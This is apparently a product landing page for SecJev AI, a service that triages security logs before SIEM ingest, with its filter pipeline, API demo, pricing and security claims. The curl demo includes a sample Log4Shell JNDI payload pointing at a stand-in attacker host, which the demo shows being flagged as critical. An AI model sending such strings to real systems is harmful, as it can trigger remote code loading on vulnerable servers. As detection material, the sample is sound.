Triage security logs
before they reach your SIEM.

SecJev AI classifies every log as noise, suspicious, or critical in real time — and drops up to 99% of the noise before you pay for SIEM ingest.

Start free PoC → 10M logs/month free · No credit card · API in 60 seconds

Most logs never reach the AI.

Every log flows through a deterministic filter chain. IOC signatures, guards, and template caching deflect the majority of traffic at zero token cost. Only novel, ambiguous patterns reach the Jev model — keeping latency and cost predictable.

📡Client
→
🧼Sanitize
→
🔍IOC / Sigs
→
🎭PII Mask
→
🛡️Guard
→
📋Template
→
⚡Cache
→
🧠Jev AI
→
📜Policy
→
🚀Burst
$0 — deterministic, no AI tokens tokens — Jev classification only passthrough / transform

From log stream to decision in one call.

No agents to deploy, no schema to map. Point your existing log shipper at SecJev and start triaging in minutes.

01 / Connect

Connect

Send logs via Vector, Fluent Bit, or plain HTTP. One endpoint, one API key. No proprietary agent, no schema migration — if it can POST JSON, it works.

02 / Triage

Triage

IOC matching, PII masking, template caching, then AI classification only for novel patterns. Deterministic filters handle the volume; Jev handles the edge cases.

03 / Act

Act

Get decisions synchronously or via signed webhooks. Noise is archived, critical events escalate. Route to your SIEM, PagerDuty, or Slack — only what matters.

One POST, one decision per log.

Send an array of raw log lines, receive a triage decision for each. The response includes confidence, the classification source, and IOC match reasons where applicable.

~/secjev — curl
# Send three logs for triage — one suspicious, one critical, one noise $ curl -s localhost:8080/v1/triage \ -H 'Authorization: Bearer sjk_...' \ -d '{"logs":[ "sshd[22]: Failed password for invalid user oracle from 185.220.101.4", "GET /?x=${jndi:ldap://evil.example/a} HTTP/1.1", "kube-probe: GET /health 200" ]}' { "results": [ {"index":0,"decision":1,"label":"suspicious","confidence":0.95,"source":"jev"}, {"index":1,"decision":2,"label":"critical","confidence":1,"reasons":["ioc:signature:log4shell"],"source":"ioc"}, {"index":2,"decision":0,"label":"noise","confidence":0.99,"source":"cache"} ], "summary": {"total":3,"noise":1,"suspicious":1,"critical":1,"by_source":{"jev":1,"ioc":1,"cache":1}} }

Pay for logs, not for noise.

Volume-based pricing that gets cheaper per log as you scale. The PoC tier is free forever — no credit card, no sales call. Start triaging in 60 seconds.

PoC
$0
Perfect for evaluation.
  • Included10M logs/mo
  • Hard cap10M logs/mo
  • Rate limit500 logs/s
  • Overage—
Start free
Starter
$299/mo
For small teams.
  • Included25M logs/mo
  • Overage$15 / 1M
  • Rate limit2,000 logs/s
  • Burst20,000
Choose Starter
Enterprise
from $4,999/mo
For MSSPs and enterprise.
  • Included1B logs/mo
  • Overage$6 / 1M
  • Rate limit50k logs/s
  • DeployVPC available
Contact sales

Built for security teams who don't trust easily.

SecJev sits in your log path. We designed it so that even if we wanted to, we couldn't see your data — and we can't prove a negative, so here are the guarantees we can give.

🎭

PII never leaves the process

Personally identifiable information is masked in-process before any log is sent to the Jev model. Only pseudonymized text reaches TypeSafe.

🚫

No raw logs stored

SecJev is a stream processor, not a data lake. Logs are triaged in flight and discarded. No persistent storage of raw log content.

🔐

HMAC-signed webhooks

Every webhook carries an X-SecJev-Signature with a timestamp, keyed by HMAC-SHA256. Replay-protected, verifiable end-to-end.

🧱

Prompt injection resistant

IOC signatures and regex guards run before AI — they can't be talked out of flagging Log4Shell. Low-confidence outputs escalate to human review.

₿

Non-custodial crypto payments

Pay via BTCPay — self-hosted, non-custodial, no intermediary holds your funds. Invoices are settled peer-to-peer on-chain.

📦

Distroless + read-only FS

Container image is ~15 MB, distroless, non-root, with a read-only root filesystem. No shell, no package manager, no attack surface.